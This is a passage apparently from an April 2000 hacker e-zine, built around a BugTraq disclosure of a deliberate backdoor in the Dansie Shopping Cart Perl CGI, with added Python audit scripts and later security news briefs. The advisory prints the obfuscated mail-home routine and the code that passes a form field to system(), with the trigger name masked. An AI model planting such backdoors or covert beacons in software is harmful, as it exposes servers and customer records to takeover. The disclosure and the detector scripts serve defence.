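    """Return (line_no, sink_kind, line) where request data reaches a shell."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for kind, sink in SINKS:
            for match in sink.finditer(line):
                if TAINT.search(match.group(1)):
                    findings.append((line_no, kind, line.strip()))
    return findings


# Constructed sample: lines taken from the fragments quoted in the advisory,
# trigger element masked with question marks exactly as the advisory does.
SAMPLE = r'''$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
$c = &there2("@there2");
if ( $ENV{'OS'} )
{
system("$FORM{'?????????'}");
}
else
{
open(ELIF,"|$FORM{'?????????'}");
}
print "Content-type: text/html\n\n";
'''

if __name__ == "__main__":
    for line_no, cloaked, clear in decode_cloaked(SAMPLE):
        print("line %d: cloaked literal %r decodes to %r" % (line_no, cloaked, clear))
    for line_no, kind, line in find_shell_sinks(SAMPLE):
        print("line %d: request data reaches %s: %s" % (line_no, kind, line))
```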
To: BugTraq
Subject: Back Door in Commercial Shopping Cart
Date: Tue Apr 11 2000 02:24:06
Author: Joe
Message-ID: <Pine.LNX.3.95.1000411171050.24527G-100000@animal.blarg.net>
Trojanized Commercial Shopping Cart
===============================================================
Dansie Shopping Cart
Version : 3.04 (presumably earlier versions as well)
Author : Craig Dansie
URL : http://www.dansie.net/
Language : Perl (both NT and Unix platforms are vulnerable)
License : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website Design
Synopsis : This program -deliberately- allows arbitrary commands to be
executed on the victim server.
One of our clients, while installing and configuring the Dansie Shopping
Cart, ran into difficulty integrating PGP, the shopping cart program, and
our secure server setup. While trying to assist our client with the cart
and PGP configuration we discovered a couple of things.
The CGI, under certain conditions, sends an email to the author of the
Dansie shopping cart software, 'tech@dansie.net'. This is not readily
apparent as the code that handles this transaction incorporates a simple
Caesar Cipher to hide the email address. The cipher is handled via the
subroutine 'there2':
------
sub there2
{
    $_ = "$_[0]";
    tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
    tr/_/-/;
    tr/\@/\./;
    return $_;
}
-------
The call that creates this email address and sends the mail is the
function 'there3'.
-------
sub there3
{
    if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
    {
        $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
        $b = &there2('8v59_3jhhzi8');
        pop(@there2);
        pop(@there2);
        $c = &there2("@there2");
        open (TECH, "|$mailprog $a");
        print TECH "To: $a\n";
        print TECH "From: $a\n";
        print TECH "Subject: $b\n\n";
        print TECH "$path3\n";
        print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
        print TECH "$c\n";
        print TECH "$e $there\n" if ($e);
        close (TECH);
    }
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
This seems curious, but plausible reasons could include insuring License
compliance, or maybe the cart automatically sends this email when an error
occurs. The program definitely goes out of its way to hide the fact that the
mail is being sent.
While going through the rest of the code we discovered a much more
interesting item.
(We've masked out the actual trigger element with question marks)
----------
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        system("$FORM{'?????????'}");
    }
    else
    {
        open(ELIF,"|$FORM{'?????????'}");
    }
    exit;
}
---------
The form element '?????????', which was originally a pseudo-random appearing
nine digit string of letters and numbers, allows an intruder to execute any
command on the server with the same privileges as the CGI process itself.
Although this is a full disclosure list, the trigger element is obscured to
prevent the script kiddies from running away with this back door. If you
own the cart, then you have access to the source code and can discover the
element in question easily enough on your own.
Further searches through the code reveal that this form element is immune
to data validation - it gets passed into this code fragment unchallenged.
The '$d' variable of the condition which permits the back door to function
is set elsewhere in the program to contain the string 'dansie'. (Again,
using the ciphertext algorithm) This indicates that the form element won't
work on Dansie's own host, but will work on anyone else's. There are
additional problems with the 'there' function but we'll leave them as
exercises for the reader to decipher.
Dansie.net, armed with the server name and URL to the CGI executable
provided by the cloaked email routine, would be able to run commands on any
web server on the Internet that has the Dansie Shopping Cart installed. It
takes little imagination to dream up the potential havoc and privacy
violations this level of access could result in; from stealing private
customer records to a full-blown crack of an E-Commerce server.
When checking to see if this was a known issue, the following post from
"Kasey Johns" <kasey at corridor dot net>, made a little over a week ago,
was discovered in alt.comp.perlcgi.freelance:
http://www.deja.com/getdoc.xp?AN=601644315
Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
We won't quote Kasey's posts here; in brief, Kasey also discovered the back
door and cloaked email routines. Kasey also provides evidence in the post to
indicate that not only is Dansie well aware of the back door routine, but
may be actively attempting to utilize it.
Based upon our own investigation, the information Kasey posted, and our own
firewall logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.
* Based upon the log snippet in Kasey's post showing attempted access to
the CGI from an Earthlink dial-up IP. (209.179.141.0/24). According to
Kasey, access to the CGI was attempted less than 30 minutes after the cart
was installed.
When we noticed the attempted usage of Kasey's server, a quick check of our
own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 on Earthlink's
dial-ups as the one used to probe Kasey's server, were from the author of
the shopping cart.
We will not try to hazard a guess as to why Dansie.net felt the need to
include a back door within their shopping cart software. Whatever their
reasoning may be, it is our opinion that no reason, no matter how well
thought out or rationalized, justifies the existence of this back door. No
reasoning can possibly explain away a routine that deliberately allows an
intruder unrestricted and unauthorized access to any server on the Internet
that has the Dansie Shopping Cart installed.
--
Joe Technical Support
General Support: support@blarg.net Blarg! Online Services, Inc.
Voice: 425/401-9821 or 888/66-BLARG http://www.blarg.net
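An added example, not part of the original post and not Dansie's code: a small Python audit script that recovers tr///-obfuscated string literals from a Perl CGI and flags lines where a request parameter reaches system() or a pipe open(). The sample source is constructed from the fragments quoted above; PARAM is a placeholder for the masked form element, and all function names are this example's own.

```python
import re

# Constructed sample: the routine and calls quoted in the post, plus the masked
# fragment. PARAM is a placeholder for the nine-character name the post hides.
SAMPLE_CGI = r'''
sub there2
{
$_ = "$_[0]";
tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
tr/_/-/;
tr/\@/\./;
return $_;
}
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
if ( $ENV{'OS'} )
{
system("$FORM{'PARAM'}");
}
else
{
open(ELIF,"|$FORM{'PARAM'}");
}
'''

SUB_RE = re.compile(r"sub\s+(\w+)\s*\{([^{}]*)\}")   # subs with brace-free bodies only
TR_RE = re.compile(r"\btr/((?:\\.|[^/\\])*)/((?:\\.|[^/\\])*)/")
SINK_RE = re.compile(r"""
      \b(?:system|exec)\s*\(?[^;]*\$FORM\{          # request data handed to a shell
    | \bopen\s*\([^;]*["']\s*\|[^;]*\$FORM\{        # ... or to a pipe open()
    | `[^`]*\$FORM\{                                # ... or to backticks
    """, re.X)


def expand_set(spec):
    """Expand a Perl tr/// character list: backslash escapes and a-z style ranges."""
    chars, i = [], 0
    while i < len(spec):
        c = spec[i]
        if c == "\\" and i + 1 < len(spec):
            chars.append(spec[i + 1])
            i += 2
        elif i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(o) for o in range(ord(c), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(c)
            i += 1
    return chars


def build_table(src_spec, dst_spec):
    """Build a str.translate table with tr/// semantics for one statement."""
    src, dst = expand_set(src_spec), expand_set(dst_spec)
    if dst and len(dst) < len(src):          # Perl pads a short list with its last char
        dst += [dst[-1]] * (len(src) - len(dst))
    # reversed() so that the first occurrence of a repeated source char wins
    return str.maketrans(dict(reversed(list(zip(src, dst)))))


def find_tr_routines(source):
    """Map each sub that consists of tr/// statements to its ordered tables."""
    routines = {}
    for name, body in SUB_RE.findall(source):
        tables = [build_table(a, b) for a, b in TR_RE.findall(body)]
        if tables:
            routines[name] = tables
    return routines


def decode_calls(source, routines):
    """Decode every constant string literal passed to a tr-based routine."""
    found = []
    for name, tables in routines.items():
        call = re.compile(r"&?\b%s\(\s*(['\"])([^'\"$@]*)\1\s*\)" % re.escape(name))
        for m in call.finditer(source):
            text = m.group(2)
            for table in tables:
                text = text.translate(table)
            found.append((m.group(2), text))
    return found


def find_command_sinks(source):
    """Return (line number, line) where $FORM{...} flows straight into a command."""
    return [(n, line.strip()) for n, line in enumerate(source.splitlines(), 1)
            if SINK_RE.search(line)]


if __name__ == "__main__":
    subs = find_tr_routines(SAMPLE_CGI)
    for cipher, plain in decode_calls(SAMPLE_CGI, subs):
        print(f"hidden literal {cipher!r} -> {plain!r}")
    for lineno, line in find_command_sinks(SAMPLE_CGI):
        print(f"line {lineno}: request data reaches a command sink: {line}")
```

The sink patterns are line-based heuristics for a first pass over a script; a hit still needs a manual read of how the parameter is validated before it gets there.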
@HWA
61.0 [HNN] MostHateD Pleads Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cacopalyse
MosthateD (Patrick W. Gregory) a member of the online group Global
Hell (gH) has pleaded guilty to a single count of conspiracy to commit
telecommunications wire fraud in Texas US District Court. He could
receive up to five years in prison and a $250,000 fine. MostHateD was
among those snared during the wave of FBI raids immediately following
the defacement of the White House web page. Mindphaser (Chad Davis),
who was snagged during the same set of raids, pleaded guilty to
similar charges earlier this year in Green Bay Wisconsin.
NewsBytes
http://www.newsbytes.com/pubNews/00/147420.html
Pay to play pocket book ream site - sorry no story - Ed
@HWA
62.0 [HNN] NSA And CIA Deny Echelon is Used Domestically
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
CIA Director George Tenet and NSA director Lt. Gen. Michael V. Hayden
staunchly denied allegations that either agency conducts electronic
surveillance on US citizens. The denials were in front of the US House
intelligence committee. After the hearing, Chairman Porter Goss,
R-Fla. said he was satisfied that "our safeguards are in place and are
working."
Associated Press - via San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/037020.htm
Dead Url
@HWA
63.0 [HNN] Keyboard Monitoring Becoming More Popular with Business
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
While keystroke monitoring software has been around for decades it has
recently become extremely popular in the corporate setting. With the
courts consistently siding with the employers on electronic monitoring
of employees and the low cost and availability of keystroke recording
software (This article says $99 but there are a lot of free ones.)
businesses are starting to snoop on their employees more and more.
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/085400.htm
Dead Url
@HWA
64.0 [HNN] Japanese Cult Wrote Software for Navy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by root66
HNN has reported on this before but another story has popped up
regarding the Japanese cult Aum Shinri Kyo (Supreme Truth), which was
involved with releasing nerve gas in a Japanese subway killing 12
people, and their involvement with developing software for the
Maritime Self Defense Force, or navy, including the whereabouts of
submarines. (Japan has submarines?)
Reuters - via The San Jose Mercury News
http://www.mercurycenter.com/breaking/docs/081626.htm
Dead Url
@HWA
65.0 [HNN] MPAA Suspects Denial of Service Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Cruciphux
Yesterday HNN reported a rumor that the MPAA was under a denial of
service attack. Today MSNBC has received confirmation that
administrators of the site suspect that their current problems are
related to some sort of DoS attack. The attack is believed to be in
retaliation for the MPAA action regarding the DeCSS software.
MSNBC
http://www.msnbc.com/news/394566.asp?0m
Dead Url
@HWA
66.0 [HNN] Even More E-zines
~~~~~~~~~~~~~~~~~~~~~~~
April 14th
contributed by Slider_100
Oblivion Mag is the latest UK underground e-zine for hackers,
phreakers and vXers! issue #2 has just been released with the first
published interview with Curador. Also L33tdawg from Hack In The Box
has announced the availability of Issue #4.
Oblivion Mag
Hack In the Box
http://www.oblivion-mag.org.uk
http://www.hackinthebox.org
@HWA
67.0 [HNN] BackDoor Now Called a Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by danders
dvwssr.dll, part of Microsoft server software with Front Page
extensions was revealed last Friday to have a backdoor password within
it that could allow malicious users access to the server. After
originally acknowledging the problem last Friday Microsoft is now
claiming that it is nothing more than a bug. (Regardless of whether this
is a backdoor or a bug the fact that such items are present in release
versions of the code forces the user to question the completeness of
Microsoft's quality assurance.)
MSNBC
Microsoft
NT Bug Traq
http://www.msnbc.com/news/394810.asp
http://www.microsoft.com/technet/security/bulletin/ms00-025.asp
http://www.ntbugtraq.com/default.asp?pid
Microsoft Security Bulletin (MS00-025) Procedure Available to Eliminate
"Link View Server-Side Component" Vulnerability
Originally Posted: April 14, 2000
Updated: April 17, 2000
Summary
On April 14, 2000, Microsoft issued the original version of this
bulletin, to discuss a security vulnerability affecting several web server
products. Shortly after publishing the bulletin, we learned of a new,
separate vulnerability that increased the threat to users of these
products. We updated the bulletin later on April 14, 2000, to advise
customers of the new vulnerability, and noted that we would provide
additional details when known. On April 17, 2000, we updated the bulletin
again to provide those details.
A procedure is available to eliminate a security vulnerability that could
allow a malicious user to cause a web server to crash, or potentially run
arbitrary code on the server, if certain permissions have been changed
from their default settings to inappropriate ones. Although this bulletin
has been updated several times as the investigation of this issue has
progressed, the remediation steps have always remained the same -
customers running affected web servers should delete the affected file,
Dvwssr.dll. Customers who have done this at any point in the past do not
need to take any further action.
Frequently asked questions regarding this vulnerability and the procedure
can be found at
http://www.microsoft.com/technet/security/bulletin/fq00-025.asp
Issue
Dvwssr.dll is a server-side component used to support the Link View
feature in Visual Interdev 1.0. However, it contains an unchecked buffer.
If overrun with random data, it could be used to cause an affected server
to crash, or could allow arbitrary code to run on the server in a System
context.
By default, the affected component, Dvwssr.dll, resides in a folder whose
permissions only allow web authors to execute it. Under these conditions,
only a person with web author privileges could exploit the vulnerability -
but a web author already has the ability to upload and execute code of his
choice, so this case represents little additional threat. However, if the
permissions on the folder were set inappropriately, or the .dll were
copied to a folder with lower permissions, it could be possible for other
users to execute the component and exploit the vulnerability.
Affected Software Versions
The affected component is part of Visual Interdev 1.0. However, it is a
server-side component, and is included in the following products:
  Microsoft® Windows NT® 4.0 Option Pack, which is the primary distribution
  mechanism for Internet Information Server 4.0
  Personal Web Server 4.0, which ships as part of Windows® 95 and 98
  Front Page 98 Server Extensions, which ships as part of Front Page 98.
NOTE: Windows 2000 is not affected by this vulnerability.
  Upgrading from an affected Windows NT 4.0 to Windows 2000 removes the
  vulnerability
  Installing Office 2000 Server Extensions on an affected server removes
  this vulnerability.
  Installing FrontPage 2000 Server Extensions on an affected server removes
  this vulnerability.
Remediation
To eliminate this vulnerability, customers who are
hosting web sites using any of the affected products should delete all
copies of the file Dvwssr.dll from their servers. The FAQ provides
step-by-step instructions for doing this. The only functionality lost by
deleting the file is the ability to generate link views of .asp pages
using Visual Interdev 1.0.
More Information
Please see the following references for more information related to this
issue.
  Frequently Asked Questions: Microsoft Security Bulletin MS00-025
  Microsoft Knowledge Base article Q259799 discusses this issue and will be
  available soon.
  Microsoft TechNet Security web site
Obtaining Support on this Issue
Information on contacting Microsoft
Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Revisions
  April 14, 2000: Bulletin Created.
  April 14, 2000: Bulletin updated to provide preliminary results of
  investigation of buffer overrun vulnerability
  April 17, 2000: Bulletin updated to provide final results of
  investigation.
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS
PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL
MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES
WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS
SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME
STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR
CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT
APPLY.
Last updated April 17, 2000
© 2000 Microsoft Corporation. All rights reserved. Terms of use.
@HWA
68.0 [HNN] North Carolina Plagued by 'hackers'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evilution
The FBI has warned that North Carolina is infested with 'hackers'
and that business leaders should be concerned. Doris Gardner from the
Charlotte office of the FBI said that several machines within North
Carolina had been used in the recent massive DDoS attacks and that
such attacks had been launched against North Carolina business. She
refused to give further details citing the ongoing investigation but
promised a wave of prosecutions soon. (Just what we need, the FBI
running around claiming the sky is falling.)
The Charlotte Observer
ABC News
http://www.charlotte.com/observer/natwor/docs/cyberterror0414.htm
http://abcnews.go.com/sections/tech/DailyNews/nchack000414.html
State Target
North Carolina Businesses Target of Net Hackers
The Associated Press
CHAPEL HILL, N.C., April 14 - The FBI is investigating computer
hacking in North Carolina. FBI agents warn that Internet hackers have
targeted several North Carolina businesses in recent months. They say
several computer systems in the state have been used by hackers to attack
businesses. Investigators spoke Thursday at the annual forum of the North
Carolina Electronics and Information Technologies Association. They urged
private businesses to cooperate in stopping hackers who are wreaking
millions of dollars in damage. This summer, the FBI plans to form a task
force with businesses to share information and alerts about hacking
attempts. The FBI will also survey North Carolina businesses to see how
many have been the victims of cyber-attacks.
@HWA
69.0 [HNN] Web Sites Redirected, Serbians Blamed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Alex
The Network Solutions registration database has been compromised again
this time by people concerned over the crisis in Kosovo. Adidas,
Pfizer, Metro Goldwyn Mayer and LucasArts Entertainments and many
others all had their DNS rerouted to point to a page that said 'Kosovo
Is Serbia'
BBC
ABC News
Wired
WebDNS
http://news.bbc.co.uk/hi/english/world/europe/newsid_712000/712211.stm
http://www.abcnews.go.com/sections/world/DailyNews/hackers000414.html
http://www.wired.com/news/politics/0,1283,35674,00.html
http://www.webdns.com/news/item1.html
Friday, 14 April, 2000, 01:24 GMT 02:24 UK
'Serb hackers' on the rampage
More than 50 websites have been taken over by what is suspected to be a
group of Serb hackers.
The websites - which included such high-profile names as Manchester United
and Adidas - were stripped of their content, and branded with the image of
a double-headed eagle, with the words "Kosovo is Serbia".
A screen grab from eunet.com's hacked site
Many of the sites were Yugoslav, Bosnian and Croatian. The Kosovo Albanian
newspaper Koha Ditore and the Albanian site Kosovapress were also among
those hacked.
In another development, the website of the Serbian Ministry of Information
reported that it and other Yugoslav sites had been taken over.
It said "American-Albanian propagandists" had forged the entire English
version of its site on Wednesday.
"In a planned and malicious action, regularly registered Yugoslav sites
were taken over on the central server of an American firm involved in the
registration of the internet domains," it added.
"Numerous sites of the Yugoslav providers, political parties and firms
were attacked in a synchronised manner," it said.
Chance discovery
Most of the companies in the "Kosovo is Serbia" attack have since
reclaimed their websites.
Manchester United believes the culprits were "cyber-squatters", who
register internet sites in the names of celebrities or well-known
companies, and then try to sell them back again.
An internet company which monitors domain names, WebDNS, spotted that the
hacking was part of a sustained campaign.
Alex Jeffreys, the technical director of WebDNS, said he noticed that
several high-profile web-sites were being hacked on Monday.
"I almost stumbled over it by chance, when I noticed that a number of
large company domain names had changed ownership," he told News Online.
As he began checking details of some of the thousands of websites being
supported by the server Webprovider Inc, he discovered more than 50 sites
that had been hacked from the same address.
Hacked websites
viagra.com
eunet.com
winston.com
jamesbond.com
indianajones.com
mafia.com
kosova.com
yu.com
slovenia.com
bosnia.com
sarajevo.com
warcrimesmonitor.com
arkan.com
tudjman.com
The hacked websites had all been registered with Network Solutions, the
world's largest register.
Mr Jeffreys said it appeared that the hackers had changed the contact
details in Network Solutions' database on Sunday night.
The contact addresses were at first transferred to a Yugoslav address, and
then on Monday night to an Albanian address.
"It seems that the Network Solutions database is quite open for hacking,
rather than it being one company in particular," he said.
How the hackers worked
It is impossible to say exactly who the hackers are, or how they managed
to breach databases that should be secure.
However, Mr Jeffreys said they probably sent spoof e-mails to Network
Solutions, pretending to be from the company concerned, and requesting a
change of address.
The requests for a modification are sent by an automatic e-mail form.
Although Network Solutions was not available for comment, a message on
their answer machine said that "if you are making a registrar name change
or contact modifications request" there would be delays while they
"carefully review your request for change".
ABC NEWS;
Hack Attack
Security Glitch Turns Major Web Sites Into Kosovo Billboards
Hackers got into more than 50 Web sites in what appeared to be a
coordinated effort to promote Serbs in Kosovo. This is what slovenia.com
looked like after the cyber attack. (slovenia.com)
By Andrew Chang
April 14 - This week, the tensions in Kosovo reached around the world, into
innumerable desktops - thanks to a group of hackers. Hackers got into more
than 50 Web sites - including those of some high-profile names, like
addidas.com, mgm.com and viagra.com - in what appeared to be a coordinated
effort to promote Serbs in Kosovo. The sites were stripped of their
content, and branded with an image of a two-headed eagle with the words,
"Kosovo is Serbia." The two-headed eagle is a common image in southeastern
Europe. It is used by Bosnian Serbs, as well as Albanians, the former
Kosovo Liberation Army, and Russians. One London newspaper report said the
hackers had hit up to 2,000 Web sites. Among the other sites that were
hacked were indianajones.com and jamesbond.com. Many of the targets were
from the Balkans. The Kosovo Albanian newspaper Koha Ditore and the
Albanian site Kosovoapress were also among those hacked, the BBC reported.
Most of the companies have since reclaimed their Web sites.
An Odd Discovery
Alex Jeffreys, technical director for WebDNS, a London-based Web security
and registration firm, says he first noticed the hacking on Monday, when he
noticed a large number of domains had changed ownership. Jeffreys told
ABCNEWS.com he was scanning a public directory of domain names when he
noticed many of them had moved the domain name contacts away from their
rightful owners to a Hotmail e-mail address. It is unusual for established
companies to move their contact e-mail address to a free e-mail service
like Hotmail, Jeffreys said. Signing up for Hotmail is almost anonymous -
and brand-name companies usually have e-mail addresses based off their own
sites.
Network Solutions to Blame?
All the hacked Web sites had been registered with Network Solutions, the
world's largest register. The hackers managed to breach security by
sending spoof e-mails to Network Solutions, pretending to be from the
company concerned and requesting a change of address, said a spokesperson
for Network Solutions, who declined to be identified. The spokesperson said
the chosen Web sites were hacked because they used the most basic level of
online security - an automated process where the e-mail address of a user
requesting a change of address is only checked against the e-mail address
on record of the person authorized to make such a change. By forging their
e-mail addresses, the hackers fooled the automation into thinking they were
authorized to make a change - and subsequently moved authority for the site
to a Hotmail account. The company does offer its users higher levels of
security, the Networks Solutions spokesperson said. Most of the prominent
sites were back to normal today, and made no mention of the hacking. A few,
like slovenia.com, still displayed the "Kosovo is Serbia" brand. Others,
like eunet.com and yu.com, appeared to have been shut down altogether.
Jeffreys hoped the Web sites had learned a valuable lesson about security.
"It shouldn't be that simple to make the change," he said.
@HWA
70.0 [HNN] Metallica Sues Napster, Gets Web Site Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Metallica shows us that they are now as hip as our dads and acting
like stuck up suits to prove it, Metallica: you're washed up, too
old, your music is limp, and you're old and decrepit. Fuck y'all
- Ed.
April 17th
contributed by Evil Wench
Metallica, one of the few groups that owns its own music, has filed
suit against Napster and several colleges for copyright infringement.
In retaliation Metallica's web site was defaced in protest. This is
the second time within the last eight months that the Metallica site
has been defaced.
ZD Net
Attrition Mirror #1
Attrition Mirror #2
http://www.zdnet.com/zdnn/stories/news/0,4586,2543398,00.html
http://www.attrition.org/mirror/attrition/1999/08/20/www.metallica.com/toprightpart.html
http://www.attrition.org/mirror/attrition/2000/04/14/www.metallica.com/
ZDNet
Metallica's Napster hit: 'Enter Lawman'
Rock group sues Napster and several colleges, alleging copyright violation
by allowing the illegal swapping of its storied music. Cybervandals
retaliate.
By Lisa Bowman, ZDNet News UPDATED April 14, 2000 12:32 PM PT
The rock group Metallica has sued Napster Inc. and several colleges,
claiming, among other things, that they violated copyright law by allowing
illegal swapping of its music. E/M Ventures and Creeping Death Music are
also plaintiffs in the suit, which was filed in U.S. District Court in the
Central District of California and targets the University of Southern
California, Yale University and Indiana University. In apparent
retaliation Friday, Metallica's Web site was targeted by cybervandals. The
unknown hackers left a simple message: "LEAVE NAPSTER ALONE." Aside from
two links -- one to Napster and another to the main page of the official
Metallica site -- no other message, on the page or in the source code, was
posted.
This is the first time a music group has gone after Napster, the
controversial software that allows people to locate and copy MP3 files.
Dozens of colleges have banned its use, claiming it hogged bandwidth and
fearing they would be slapped with lawsuits similar to this one. However,
in February, USC bucked that trend, saying that it would continue to allow
its students to use the technology, which is downloadable from the
Internet.
San Mateo, Calif.-based Napster already is the target of a suit by the
Recording Industry Association of America, which claims that Napster
violates the Digital Millennium Copyright Act, a new law that bars devices
that could be used to circumvent copyrights.
The suit says students who use Napster 'exhibit the moral fiber of common
looters.'
Having Metallica as a plaintiff in this latest case gives the industry
even more brand-name backing.
The recording industry is worried that digital music files will weaken
their power over the sale and distribution of songs, and Napster is one of
several new technologies that make it easier for people to swap digital
music files.
'Morally and legally wrong' In a press release announcing the suit,
publicists for the band and music companies even threw in a statement from
Metallica drummer Lars Ulrich, who said it is "sickening to know that our
art is being traded like a commodity rather than the art that it is."
"From a business standpoint, this is about piracy -- aka taking something
that doesn't belong to you -- and that is morally and legally wrong."
In the suit, Metallica and the music companies claim that Napster not only
violated their copyrights, but also encouraged unlawful use of digital
audio devices and enabled the violation of the Racketeering Influenced &
Corrupt Organizations Act, or RICO.
The suit says that students who use Napster to copy files "exhibit the
moral fiber of common looters."
Napster officials weren't immediately available for comment.
@HWA
71.0 [HNN] Japan To Control PS Exports, Fears Weapon Use
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 17th
contributed by Evil Wench
Japanese officials have placed severe export restrictions on the new
PlayStation2 that prevents Sony from shipping units to the US and
other countries. Officials fear that the technology could be used as a
weapon. An example given was to use the PS2 image processing
capabilities to help control a Tomahawk missile.
Reuters - via ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2550857,00.html
@HWA
72.0 [HNN] Spy Laptop Goes Missing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 18th
contributed by William Knowles
A laptop filled with highly secret information was reported missing
from a supposedly secure conference room at the State Department's
Bureau of Intelligence over a week ago. Officials are unsure at this
point if the laptop was stolen or is merely misplaced. (Misplaced?)
Associated Press
Washington Post
http://ap.tbo.com/ap/breaking/MGIVIOBR57C.html
defunct url
http://www.washingtonpost.com/wp-dyn/articles/A26517-2000Apr16.html
Post;
State Dept. Computer With Secrets Vanishes
By Steven Mufson Washington Post Staff Writer Monday, April 17, 2000; Page
A02
A laptop computer containing top-secret information vanished from the
State Department's Bureau of Intelligence and Research more than a week
ago, and the FBI is investigating whether it was stolen, a senior State
Department official said.
The laptop's disappearance from a supposedly secure conference room at the
department has set off an intense effort to recover the computer and a
search for suspects, including contractors who have been renovating the
area, the official said.
Another person familiar with the incident said that the missing computer
contains "code word" information, a classification higher than top secret,
and that it includes sensitive intelligence information and plans.
The incident is the latest of a string of embarrassing security breaches
at the State Department. Last year, counterintelligence officials from the
FBI discovered a Russian spy lurking outside the department and later an
eavesdropping device planted in a conference room. In 1998, a man dressed
in a tweed coat strolled into the executive secretary's office, six doors
down from the office of Secretary of State Madeleine K. Albright, helped
himself to a sheaf of classified briefing materials in plain view of two
secretaries, and walked out. The man was never identified and the
materials were never recovered.
A senior State Department official said that it remained unclear whether
the laptop was misplaced or stolen and that, if it was stolen, whether the
thief realized the sensitivity of the material it contained or took it
simply for the value of the hardware.
The senior State Department official added that the laptop's disappearance
was not the result of poor security procedures, but rather the failure of
State employees to follow those procedures. He said it appeared that some
contractors had not been properly escorted when working in the building.
"Some policies and procedures were not followed," said the senior
official. "It is my very sincere hope that the responsible individual or
individuals will be punished."
Another person familiar with the incident said that an official had
propped open the door of a secure conference room, that contractors
lacking security clearances were working in the sensitive area and that
the laptop had not been properly secured.
The material the laptop contains is classified as "sensitive compartmented
information" (SCI), the government's most sensitive intelligence reports.
The Bureau of Intelligence and Research (INR) is responsible for handling
all top-secret reports at State; information with lower levels of
classification is handled by the Office of Diplomatic Security.
Last year, INR came under fire from the department's inspector general for
lax handling of that material. "The department is substantially not in
compliance with the director of central intelligence's directives that
govern the handling of SCI," the inspector general, Jacqueline
Williams-Bridger, concluded in the report.
The CIA also "questioned INR's dedication" to the proper handling of the
top-secret material, the State Department official said. The CIA and other
agencies believe that the State Department in general fails to attach
adequate importance to safeguarding secrets.
The inspector general recommended transferring responsibility for SCI to
State's Office of Diplomatic Security. But a just-completed internal
review recommended leaving responsibility for SCI with INR and adding 19
new people to help the bureau better handle the material, the department
official said.
The inspector general's report and the Russian bugging incident prompted
criticism from Congress, which sequestered some funding earmarked for INR
and demanded a review of how top-secret information is handled at the
department. At a Feb. 7 presentation of State's budget, Albright said she
was "continuing to study the possible need for structural changes to
ensure that the mandate for the best security is everywhere understood and
everywhere applied."
The State Department laptop incident follows two intelligence episodes
involving stolen laptops in England. A laptop containing sensitive
information was stolen from a British army officer at Heathrow Airport.
Separately, a laptop containing secret information about Northern Ireland
was stolen from an MI5 agent at the Paddington Station of the London
Underground. In a third incident, an MI6 officer left his laptop computer
containing training information about how to be a spy in a taxi after a
night spent drinking at a bar near the agency's London headquarters.
MI6 is the British agency responsible for foreign intelligence and foreign
